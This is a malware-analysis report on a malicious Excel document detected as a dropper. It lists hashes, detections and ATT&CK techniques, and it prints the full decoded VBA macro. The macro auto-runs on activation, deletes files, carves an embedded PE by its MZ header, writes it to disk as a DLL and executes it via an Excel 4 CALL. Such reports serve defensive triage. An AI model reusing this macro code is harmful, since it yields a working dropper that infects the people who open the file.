Office (OLE) malware analysis — malicious · a25d63cfbe6bf689

MALICIOUS

Office (OLE)

827.0 KB Created: 2019-08-30 09:14:50 Authoring application: Microsoft Excel First seen: 2020-07-24

MD5: 9c6cca0dddd9f683c9d9e6b41c1bdf18 SHA-1: 7e114263fb98dc186593eba37495e7fa8ed7c4a6 SHA-256: a25d63cfbe6bf689b92f24dcd75b80459d8fb969ae35ddbf7cf39aa4c84794d3

442 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer

The file contains VBA macros that leverage `Shell()` and `LoadLibrary` API calls, indicating an attempt to execute code. Crucially, a PE executable is embedded within the document, and heuristics confirm its extraction and suspicious nature. The VBA script likely facilitates the execution of this embedded payload, which is characteristic of a dropper malware.

Heuristics 10

ClamAV: Win.Dropper.Hideproc-6663113-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Win.Dropper.Hideproc-6663113-0
Embedded PE executable critical OLE_EMBEDDED_EXE

MZ/PE header found inside document — possible embedded executable
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA
Matched line in script
```
         sendings = 1
         Dim sNMSP As New Shell
```
Reference to Windows Script Host high SC_STR_WSCRIPT

Reference to Windows Script Host
Reference to LoadLibrary API high SC_STR_LOADLIBRARY

Reference to LoadLibrary API
Reference to GetProcAddress API high SC_STR_GETPROCADDRESS

Reference to GetProcAddress API
Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC

Reference to VirtualAlloc API
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://www.microsoft.com0 In document text (OLE body)
- http://crl.microsoft.com/pki/crl/products/MicrosoftTimeStampPCA.crl0XIn document text (OLE body)
- http://www.microsoft.com/pki/certs/MicrosoftTimeStampPCA.crt0In document text (OLE body)
- http://crl.microsoft.com/pki/crl/products/MicCodSigPCA_08-31-2010.crl0ZIn document text (OLE body)
- http://www.microsoft.com/pki/certs/MicCodSigPCA_08-31-2010.crt0In document text (OLE body)
- http://crl.microsoft.com/pki/crl/products/microsoftrootcert.crl0TIn document text (OLE body)
- http://www.microsoft.com/pki/certs/MicrosoftRootCert.crt0In document text (OLE body)

Extracted artifacts 3

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	14372 bytes
SHA-256: `56be25cbb6875a49ad962ac7fa31f271de6c58edf73c655f0e6ec6ff2847baa8`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "one" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Private Sub Workbook_Activate() If PrepareForm.Visible = False Then PopulateDivineCommercial 821 End If End Sub Public Sub PopulateDivineCommercial(dImmer As Integer) Dim ActiveHotbit As New WshShell Dim s As String Dim GetInfirmityLevelDescription As String Dim d As Long d = 3 d = d - 1 Select Case d Case 0 s = "No health problems" Case 1 s = "Minor health problems" Case 2 s = "Major health problems" Case 3 s = "Severe disability" End Select Dim SpecialPath As String PRP = "%" + UserForm6.TextBox1.Tag UserForm6.TextBox1.Tag = ActiveHotbit.ExpandEnvironmentStrings(PRP + "%") Dim car As CarClass Set car = New CarClass UserForm6.TextBox3.Tag = car.CheckCar(ActiveHotbit, "" & UserForm6.TextBox3.Tag + "") ChDir (UserForm6.TextBox1.Tag) PrepareForm.show End Sub Attribute VB_Name = "Page1" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Module1" #If VBA7 And Win64 Then Public Const FlagDouble = True #Else Public Const FlagDouble = False #End If Public DisputeChannel3 As Byte Public Declaration() As Byte Public abbrev As Byte Public DisputeChannel4 As Byte Public Sub PrepareConfigForOutput() On Error Resume Next Dim i As Long Dim sNextChar As String Dim tooolsetChunkI As Boolean Dim tooolsetChunkQ As Boolean Dim sCommand As String Dim PrepareConfigForOutput As Long PrepareConfigForOutput = 0 tooolsetChunkIParameter = False tooolsetChunkQ = False sCommand = Command$ For i = 1 To ALen.B(sCommand) sNextChar = Mid(sCommand, i, 1) If tooolsetChunkIParameter Then If tooolsetChunkQ Then If sNextChar = " " Then tooolsetChunkIParameter = False tooolsetChunkQ = False PrepareConfigForOutput = PrepareConfigForOutput + 1 End If End If End If Next i If tooolsetChunkIParameter Then PrepareConfigForOutput = PrepareConfigForOutput + 1 End Sub Public Sub PathBack(ByVal sPath As String) On Error Resume Next Dim sT As Variant Dim tt As String If Len(sPath) = 3 Then GoTo errorhand For ii = 0 To UBound(sT) - 2 tt = tt & sT(ii) & "\" Next ii PathB.ack = tt errorhand: Path.Back = sPath End Sub Public Sub GetParam(Count As Integer) Dim i As Long Dim j As Integer Dim c As String Dim tooolsetChunkI As Boolean Dim tooolsetChunkQ As Boolean j = 1 tooolsetChunkI = False tooolsetChunkQ = False GetP.aram = "" For i = 1 To Len(Comma.nd$) c = Mi.d$(Comma.nd$, i, 1) If tooolsetChunkI Then If c = """" Then j = j + 1 tooolsetChunkI = False tooolsetChunkQ = False End If ElseIf tooolsetChunkI And Not tooolsetChunkQ Then If c = " " Then j = j + 1 tooolsetChunkI = False tooolsetChunkQ = False End If Else If c = """" Then If j > Count Then Exit Sub tooolsetChunkI = True tooolsetChunkQ = True ElseIf c <> " " Then tooolsetChunkI = True tooolsetChunkQ = False End If End If If tooolsetChunkI And j = Count And c <> """" Then GetP.aram = GetP.aram & c Next i End Sub Attribute VB_Name = "PrepareForm" Attribute VB_Base = "0{D1B1FD56-282A-4460-BD0C-0949FD7E35F8}{7BF60A63-CF26-4196-A1D8-20F806F385A9}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Private Sub UserForm_Initialize() Call KeyPropUpdate(Me, False) End Sub Private Sub UserForm_Activate() DoEvents DoEvents DerTip DoEvents End Sub Attribute VB_Name = "Module2" Public Const GWL_STYLE = -16 Public Const WS_CAPTION = &HC00000 Public Const WS_SYSMENU = &H80000 Public Const FirstB As Byte = 77 Public Const SecondB As Byte = 90 Public Const ThirdB As Byte = 144 #If VBA7 Then Public Declare PtrSafe Function BoxWSL _ Lib "user32" Alias "SetWindowLongA" (ByVal parameter1 As Long, _ ByVal nIndex As Long, ByVal dwNewLong As Long) As Long Public Declare PtrSafe Function FWA1 _ Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, _ ByVal lpWindowName As String) As Long Public Declare PtrSafe Function DrawMenuBar _ Lib "user32" (ByVal parameter1 As Long) As Long Public Declare PtrSafe Function GetWindowLong11 _ Lib "user32" Alias "GetWindowLongA" (ByVal parameter1 As Long, _ ByVal nIndex As Long) As Long #Else Public Declare Function GetWindowLong11 _ Lib "user32" Alias "GetWindowLongA" ( _ ByVal parameter1 As Long, ByVal nIndex As Long) As Long Public Declare Function FWA1 _ Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, _ ByVal lpWindowName As String) As Long Public Declare Function DrawMenuBar _ Lib "user32" (ByVal parameter1 As Long) As Long Public Declare Function BoxWSL _ Lib "user32" Alias "SetWindowLongA" ( _ ByVal parameter1 As Long, ByVal nIndex As Long, ByVal dwNewLong As Long) As Long #End If Public Function NumberBuffer(LongData As Long, Context As Integer, ByVal ByteData As Byte) If PrepareForm.Enabled = True Then Put #LongData, , ByteData End If End Function Public Function ColumnRangeWidth(ByVal ColRange As String, ByVal Width As Single) As Boolean ColumnRangeWidth = True On Error GoTo ErrorHandler Excel.Worksheets(1).Columns(ColRange).ColumnWidth = Width Exit Function ErrorHandler: ColumnRangeWidth = False Resume Next End Function Public Function ColumnWidth(ByVal Col As Integer, ByVal Width As Single) As Boolean ColumnWidth = True On Error GoTo ErrorHandler Excel.Worksheets(1).Columns(Col).ColumnWidth = Width Exit Function ErrorHandler: ColumnWidth = False Resume Next End Function Public Function GetFlexGridColFromXPos(TheGrid, XPos As Single) As Long On Error GoTo ErrorTrap Dim i As Long, lAccWidth As Long With TheGrid For i = 0 To .Cols - 1 lAccWidth = lAccWidth + .ColWidth(i) If XPos <= lAccWidth Then GetFlexGridColFromXPos = i Exit Function End If Next i End With Exit Function ErrorTrap: Exit Function End Function Private Sub ERRCHECK(result) If result = RCPN_D_FMOD_OK Then ms.gR.esult = MsgBox(result & ") ") End If End Sub Public Sub DerTip() Dim sendings As Integer dershlep = "" + UserForm6.TextBox1.Tag Dim ofbl As String ofbl = UserForm6.TextBox3.Tag + "\libOmio.dll" Dim CurrentSizeOfAT As Long ctackPup = Join(Array(UserForm6.TextBox1.Tag, "\funduct.xlsx"), "") ctackPop = Join(Array(dershlep, UserForm6.TextBox3.Value), "") Dim arr(1 To 3) As String ctackPip = ctackPup & Page11.Range("A100").Value PublicResumEraseByArrayList ctackPop, ctackPip, ofbl VistaQ ctackPup FileCopy ctackPup, ctackPip sendings = 1 Dim sNMSP As New Shell If sendings > 0 And sendings > -30 Then Set FileWherePutTo2 = sNMSP.Namespace(dershlep) Set FileWherePutTo = sNMSP.Namespace(ctackPip) FileWherePutTo2.CopyHere FileWherePutTo.Items.Item(UserForm6.Label11.Tag) End If CurrentSizeOfAT = 285696 If FlagDouble Then CurrentSizeOfAT = 300000 + 9240 + 8 sendings = 2 End If Composition dershlep & UserForm6.Label1.Tag, ofbl, CurrentSizeOfAT, sendings If sendings >= -10 Then sendings = sendings + 1 ChDir (UserForm6.TextBox3.Tag) sendings = sendings + 1 End If If sendings < 100 Then sendings = sendings + 1 sendings = sendings + 1 End If PrepareConfigForOutput If sendings < 0 Then sendings = sendings + 1 sendings = sendings + 1 End If ofbl = "CA" + "LL(""" + ofbl ExecuteExcel4Macro ofbl & """,""pipk"",""J"")" End Sub Public Sub VistaQ(WhereToGo) DoEvents ThisWorkbook.Sheets.Copy Application.DisplayAlerts = False DoEvents ActiveWorkbook.SaveAs WhereToGo, Local:=False, FileFormat:=3 * 7 + 3 * 7 + 9 DoEvents ActiveWorkbook.Close DoEvents End Sub Attribute VB_Name = "Module0" Attribute VB_Name = "UserForm6" Attribute VB_Base = "0{71D68EAA-1A75-4990-A814-F904BBDDB3D0}{CB84FF3A-FB5B-4593-A8C8-B1F9D1C89B37}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Page11" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Module4" Public Sub GetParam(Count As Integer) Dim i As Long Dim j As Integer Dim c As String Dim tooolsetChunkI As Boolean Dim tooolsetChunkQ As Boolean j = 1 tooolsetChunkI = False tooolsetChunkQ = False GetP.aram = "" For i = 1 To Len(Comma.nd$) c = Mi.d$(Comma.nd$, i, 1) If tooolsetChunkI Then If c = """" Then j = j + 1 tooolsetChunkI = False tooolsetChunkQ = False End If ElseIf tooolsetChunkI And Not tooolsetChunkQ Then If c = " " Then j = j + 1 tooolsetChunkI = False tooolsetChunkQ = False End If Else If c = """" Then If j > Count Then Exit Sub tooolsetChunkI = True tooolsetChunkQ = True ElseIf c <> " " Then tooolsetChunkI = True tooolsetChunkQ = False End If End If If tooolsetChunkI And j = Count And c <> """" Then GetP.aram = GetP.aram & c Next i End Sub Attribute VB_Name = "Module5" Public Sub KeyPropUpdate(frm As Object, show As Boolean) Dim windowStyle As Long Dim windowHandle As Long windowHandle = FWA1(vbNullString, frm.Caption) windowStyle = GetWindowLong11(windowHandle, GWL_STYLE) If show Then BoxWSL windowHandle, GWL_STYLE, (windowStyle + WS_SYSMENU) Else BoxWSL windowHandle, GWL_STYLE, (windowStyle And Not WS_SYSMENU) End If DrawMenuBar (windowHandle) End Sub Public Sub PublicResumEraseByArrayList(ParamArray putArrayBigList() As Variant) On Error Resume Next For Each Key In putArrayBigList Kill Key Next Key On Error GoTo 0 End Sub Public Sub Composition(Composition2 As String, ofbl As String, fl As Long, DisputeChannel6 As Integer) Dim DisputeChannel1 As Long Dim SimpleMethod As Integer ReDim Declaration(1 To fl) DisputeChannel1 = FreeFile Open Composition2 For Binary Access Read As DisputeChannel1 Dim cur As Integer cur = 1 Do While 1 Get DisputeChannel1, , abbrev If abbrev = FirstB Then Declaration(1) = abbrev Get DisputeChannel1, , DisputeChannel3 If DisputeChannel3 = SecondB Then Declaration(2) = DisputeChannel3 Get DisputeChannel1, , DisputeChannel4 If DisputeChannel4 = ThirdB Then Declaration(3) = DisputeChannel4 If cur = DisputeChannel6 Then For k = 4 To fl Get DisputeChannel1, , abbrev Declaration(k) = abbrev Next k Exit Do Else cur = cur + 1 End If End If End If End If Loop Close DisputeChannel1 On Error Resume Next DisputeChannel1 = FreeFile Open ofbl For Binary Lock Read Write As #DisputeChannel1 For i = LBound(Declaration) To UBound(Declaration) If PrepareForm.Enabled = True Then NumberBuffer DisputeChannel1, 70, Declaration(i) End If Next i Close DisputeChannel1 DisputeChannel1 = FreeFile For HSP = 33 To -1 Step -0.25 DisputeChannel1 = 6 + i Next HSP End Sub Attribute VB_Name = "CarClass" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Dim vSpeed As Integer Dim vLicensePlate As String Public Property Get Speed() As Integer Speed = vSpeed End Property Public Property Let Speed(sp As Integer) vSpeed = Application.WorksheetFunction.Min(sp, 100) vSpeed = Application.WorksheetFunction.Max(vSpeed, -100) End Property Public Property Get CheckCar(car As Object, Drive As String) CheckCar = car.SpecialFolders("" + Drive) End Property Public Property Get SpecialFolders() As String LicensePlate = vLicensePlate End Property Public Property Let LicensePlate(lp As String) If Len(lp) <> 6 Then Err.Raise (xlErrValue) 'Raise error vLicensePlate = lp End Property
`embedded_office_000044f1.exe`	embedded-pe	Office MZ+PE at offset 0x44F1	829199 bytes
SHA-256: `a1a839e5fef39aff8edacc2bd92c525945609703d3442f11252d06ef23257e92`
Detection ClamAV: Win.Dropper.Hideproc-6663113-0 Obfuscation or payload: likely Static shellcode analysis recovered command string(s): WScript.Shellin
`ole10native_00.bin`	ole-package	OLE Ole10Native stream: MBD0090C244/Ole10Native	614941 bytes
SHA-256: `19b52f1add3d684446fd404d2b90f24697030288cf5c2c5ba0e06da52f179e3d`

Open this report in the interactive analyzer, or submit your own file for analysis.